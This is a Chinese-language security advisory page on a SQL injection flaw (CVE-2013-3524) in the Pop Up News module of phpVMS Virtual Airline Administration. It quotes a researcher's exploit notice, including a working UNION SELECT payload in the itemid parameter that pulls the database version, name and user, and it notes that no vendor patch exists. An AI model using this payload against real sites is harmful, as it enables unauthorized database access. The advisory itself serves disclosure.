当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

phpVMS Virtual Airline Administration \'itemid\'参数SQL注入漏洞

信息来源: NoGe (jong_amq@hotmail.com)      发表日期:2013-02-15 16:30:00

phpVMS Virtual Airline Administration是免费的虚拟航空软件,支持多数ACARS应用,AJAX驱动的管理面板。

phpVMS Virtual Airline Administration 2.1.934、2.1.935的Pop Up News module 2.0内,popupnewsitem/内存在SQL注入漏洞,可使远程攻击者通过itemid参数执行任意SQL命令。

 

BUGTRAQ-ID:59057

CVE-ID:2013-3524

受影响系统:

phpvms phpVMS Virtual Airline Administration 2.1.935

phpvms phpVMS Virtual Airline Administration 2.1.934

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负![o] phpVMS Virtual Airline Administration <= SQL Injection Vulnerability

 

       Software : phpVMS Virtual Airline Administration

       Version  : 2.1.934 & 2.1.935

       Vendor   : http://www.phpvms.net

       Author   : NoGe

       Contact  : noge[dot]code[at]gmail[dot]com

       Desc     : phpVMS is the most popular, free, virtual airline software,

          with support for various ACARS applications (kACARS, FSACARS, XAcars, FS Flight Keeper, and FSPassengers),

          AJAX-driven administration panel, complete with financial reports, schedule management and

          various other features designed for realistic operation of your virtual airline.

 

 

=============================================================================================================

 

 

  [o] Exploit

 

       http://localhost/[path]/index.php/PopUpNews/popupnewsitem/?itemid=[SQLi]

 

 

=============================================================================================================

 

 

  [o] PoC

 

       http://localhost/path/index.php/PopUpNews/popupnewsitem/?itemid=123+union+select+1,version(),database(),4,user()--

 

 

=============================================================================================================

 

 

  [o] Greetz

 

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory

       aJe kaka11 matthews wishnusakti inc0mp13te martfella

       pizzyroot Genex H312Y noname tukulesto }^-^{

 

 

=============================================================================================================

 

 

  [o] April 15 2013 - Papua, Indonesia

解决办法:

厂商补丁:

phpvms

------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

 

http://www.phpvms.net